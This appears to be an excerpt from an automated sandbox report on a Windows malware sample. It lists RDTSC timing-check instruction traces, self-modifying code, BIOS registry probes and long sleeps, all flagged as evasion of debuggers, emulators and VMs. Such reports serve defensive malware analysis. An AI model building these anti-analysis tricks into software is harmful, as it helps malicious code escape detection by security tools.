                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E906F3 second address: 4E90730 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1BB4E5F532h 0x00000009 xor cx, 6168h 0x0000000e jmp 00007F1BB4E5F52Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F1BB4E5F52Eh 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E90730 second address: 4E90734 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E90734 second address: 4E9073A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E9073A second address: 4E9076D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BB4D69EAEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop eax 0x0000000f call 00007F1BB4D69EB9h 0x00000014 pop eax 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E9076D second address: 4E90773 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E90834 second address: 4E90843 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BB4D69EABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E90843 second address: 4E9084A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E9084A second address: 4E90860 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, esi 0x00000009 pushad 0x0000000a mov ch, bl 0x0000000c mov ah, CAh 0x0000000e popad 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E90860 second address: 4E90864 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E90864 second address: 4E9086A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E9086A second address: 4E90880 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1BB4E5F532h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E90880 second address: 4E90884 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E90884 second address: 4E80120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 leave 0x00000009 pushad 0x0000000a mov edx, 717AC810h 0x0000000f call 00007F1BB4E5F539h 0x00000014 pushfd 0x00000015 jmp 00007F1BB4E5F530h 0x0000001a sbb cx, BB88h 0x0000001f jmp 00007F1BB4E5F52Bh 0x00000024 popfd 0x00000025 pop ecx 0x00000026 popad 0x00000027 retn 0004h 0x0000002a nop 0x0000002b sub esp, 04h 0x0000002e xor ebx, ebx 0x00000030 cmp eax, 00000000h 0x00000033 je 00007F1BB4E5F68Ah 0x00000039 mov dword ptr [esp], 0000000Dh 0x00000040 call 00007F1BB92EB7D9h 0x00000045 mov edi, edi 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E80120 second address: 4E80124 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E80124 second address: 4E8012A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E8012A second address: 4E80143 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov bx, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F1BB4D69EABh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E80143 second address: 4E8016B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BB4E5F539h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov bl, ch 0x0000000f mov bx, 17CAh 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E8016B second address: 4E801A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F1BB4D69EAEh 0x00000008 pop ecx 0x00000009 mov di, 2146h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 xchg eax, ebp 0x00000011 jmp 00007F1BB4D69EADh 0x00000016 mov ebp, esp 0x00000018 pushad 0x00000019 mov dl, ah 0x0000001b mov esi, ebx 0x0000001d popad 0x0000001e sub esp, 2Ch 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E801A3 second address: 4E801A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E801A7 second address: 4E801AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E801AB second address: 4E801B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E802B2 second address: 4E802C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BB4D69EABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E803B6 second address: 4E803BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E803BC second address: 4E803C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E803C0 second address: 4E803F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BB4E5F534h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007F1BB4E5F5AFh 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F1BB4E5F537h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E803F9 second address: 4E803FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E803FF second address: 4E80474 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [ebp-14h], edi 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F1BB4E5F52Dh 0x00000012 and eax, 13279A06h 0x00000018 jmp 00007F1BB4E5F531h 0x0000001d popfd 0x0000001e mov edx, eax 0x00000020 popad 0x00000021 jne 00007F1C2693D58Dh 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007F1BB4E5F52Fh 0x0000002e and cl, 0000003Eh 0x00000031 jmp 00007F1BB4E5F539h 0x00000036 popfd 0x00000037 popad 0x00000038 mov ebx, dword ptr [ebp+08h] 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e mov di, 06AAh 0x00000042 popad 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E80474 second address: 4E8047A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E8047A second address: 4E804B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-2Ch] 0x0000000b jmp 00007F1BB4E5F536h 0x00000010 xchg eax, esi 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F1BB4E5F537h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E804B5 second address: 4E8056D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BB4D69EB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F1BB4D69EB1h 0x0000000f xchg eax, esi 0x00000010 pushad 0x00000011 jmp 00007F1BB4D69EACh 0x00000016 pushfd 0x00000017 jmp 00007F1BB4D69EB2h 0x0000001c sub ecx, 2FF61FB8h 0x00000022 jmp 00007F1BB4D69EABh 0x00000027 popfd 0x00000028 popad 0x00000029 nop 0x0000002a jmp 00007F1BB4D69EB6h 0x0000002f push eax 0x00000030 pushad 0x00000031 mov di, 7FC4h 0x00000035 mov ax, bx 0x00000038 popad 0x00000039 nop 0x0000003a pushad 0x0000003b mov eax, 025647C7h 0x00000040 popad 0x00000041 xchg eax, ebx 0x00000042 jmp 00007F1BB4D69EAAh 0x00000047 push eax 0x00000048 jmp 00007F1BB4D69EABh 0x0000004d xchg eax, ebx 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007F1BB4D69EB0h 0x00000057 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E8056D second address: 4E80571 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E80571 second address: 4E80577 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E805A8 second address: 4E805AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E805AE second address: 4E805B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E805B2 second address: 4E805DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov eax, 7468165Fh 0x00000012 call 00007F1BB4E5F534h 0x00000017 pop ecx 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E805DA second address: 4E805F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1BB4D69EB7h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E805F5 second address: 4E805F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E805F9 second address: 4E80011 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a pushad 0x0000000b movsx edx, cx 0x0000000e mov esi, 0C2D94C3h 0x00000013 popad 0x00000014 je 00007F1C26847EEEh 0x0000001a xor eax, eax 0x0000001c jmp 00007F1BB4D435DAh 0x00000021 pop esi 0x00000022 pop edi 0x00000023 pop ebx 0x00000024 leave 0x00000025 retn 0004h 0x00000028 nop 0x00000029 sub esp, 04h 0x0000002c mov esi, eax 0x0000002e xor ebx, ebx 0x00000030 cmp esi, 00000000h 0x00000033 je 00007F1BB4D69FE5h 0x00000039 call 00007F1BB91F5EECh 0x0000003e mov edi, edi 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007F1BB4D69EADh 0x00000047 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E80011 second address: 4E80017 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E80017 second address: 4E8001B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E8001B second address: 4E8002F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov di, DCD4h 0x00000010 movsx ebx, cx 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E8002F second address: 4E80035 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E80035 second address: 4E80039 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E80039 second address: 4E8005A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b pushad 0x0000000c call 00007F1BB4D69EB3h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E8005A second address: 4E8006A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov eax, edx 0x00000007 popad 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E8006A second address: 4E8006E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E8006E second address: 4E80074 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E80074 second address: 4E8007A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E8007A second address: 4E8007E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E8007E second address: 4E800BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 pushad 0x0000000a mov ebx, esi 0x0000000c mov ecx, 51BD0071h 0x00000011 popad 0x00000012 mov dword ptr [esp], ecx 0x00000015 pushad 0x00000016 mov bx, cx 0x00000019 mov cx, 0A65h 0x0000001d popad 0x0000001e mov dword ptr [ebp-04h], 55534552h 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F1BB4D69EB7h 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E800BC second address: 4E800C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E800C2 second address: 4E800C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E800C6 second address: 4E800CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E809F1 second address: 4E809F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ax, bx 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E809F9 second address: 4E809FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E809FF second address: 4E80A03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E80A03 second address: 4E80AA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BB4E5F52Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007F1BB4E5F530h 0x00000012 cmp dword ptr [769B459Ch], 05h 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F1BB4E5F52Eh 0x00000020 sub cx, 4548h 0x00000025 jmp 00007F1BB4E5F52Bh 0x0000002a popfd 0x0000002b pushfd 0x0000002c jmp 00007F1BB4E5F538h 0x00000031 add esi, 721B07A8h 0x00000037 jmp 00007F1BB4E5F52Bh 0x0000003c popfd 0x0000003d popad 0x0000003e je 00007F1C2692D4A8h 0x00000044 jmp 00007F1BB4E5F536h 0x00000049 pop ebp 0x0000004a push eax 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e pushad 0x0000004f popad 0x00000050 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E80AA0 second address: 4E80ABD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BB4D69EB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E908EA second address: 4E90971 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1BB4E5F52Eh 0x00000009 xor al, 00000018h 0x0000000c jmp 00007F1BB4E5F52Bh 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F1BB4E5F538h 0x00000018 or cl, 00000078h 0x0000001b jmp 00007F1BB4E5F52Bh 0x00000020 popfd 0x00000021 popad 0x00000022 pop edx 0x00000023 pop eax 0x00000024 xchg eax, ebp 0x00000025 jmp 00007F1BB4E5F536h 0x0000002a push eax 0x0000002b jmp 00007F1BB4E5F52Bh 0x00000030 xchg eax, ebp 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F1BB4E5F535h 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E90971 second address: 4E90977 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E90977 second address: 4E909B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F1BB4E5F52Fh 0x0000000f xchg eax, esi 0x00000010 jmp 00007F1BB4E5F536h 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F1BB4E5F52Dh 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E909B9 second address: 4E909BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E909BF second address: 4E90A7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BB4E5F52Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007F1BB4E5F530h 0x0000000f mov esi, dword ptr [ebp+0Ch] 0x00000012 pushad 0x00000013 pushad 0x00000014 mov si, 87B3h 0x00000018 pushfd 0x00000019 jmp 00007F1BB4E5F538h 0x0000001e or cx, 29B8h 0x00000023 jmp 00007F1BB4E5F52Bh 0x00000028 popfd 0x00000029 popad 0x0000002a pushfd 0x0000002b jmp 00007F1BB4E5F538h 0x00000030 adc ecx, 261BE418h 0x00000036 jmp 00007F1BB4E5F52Bh 0x0000003b popfd 0x0000003c popad 0x0000003d test esi, esi 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 push edi 0x00000043 pop esi 0x00000044 pushfd 0x00000045 jmp 00007F1BB4E5F537h 0x0000004a or ah, FFFFFF8Eh 0x0000004d jmp 00007F1BB4E5F539h 0x00000052 popfd 0x00000053 popad 0x00000054 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E90A7D second address: 4E90A8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1BB4D69EACh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E90A8D second address: 4E90ABB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BB4E5F52Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F1C2691CE3Fh 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F1BB4E5F535h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E90ABB second address: 4E90AF7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 5FBEE3B2h 0x00000008 jmp 00007F1BB4D69EB3h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 cmp dword ptr [769B459Ch], 05h 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F1BB4D69EB5h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E90AF7 second address: 4E90AFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E90AFD second address: 4E90B01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E90B01 second address: 4E90B46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F1C26934EB4h 0x0000000e jmp 00007F1BB4E5F52Fh 0x00000013 xchg eax, esi 0x00000014 jmp 00007F1BB4E5F536h 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F1BB4E5F52Eh 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E90C56 second address: 4E90C5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E90C5C second address: 4E90C60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E90C60 second address: 4E90C6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E90C6F second address: 4E90C87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BB4E5F534h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeSpecial instruction interceptor: First address: BC0568 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeSpecial instruction interceptor: First address: C50EE9 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe TID: 4788Thread sleep time: -34017s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe TID: 5060Thread sleep time: -240000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe TID: 3164Thread sleep time: -34017s >= -30000sJump to behavior
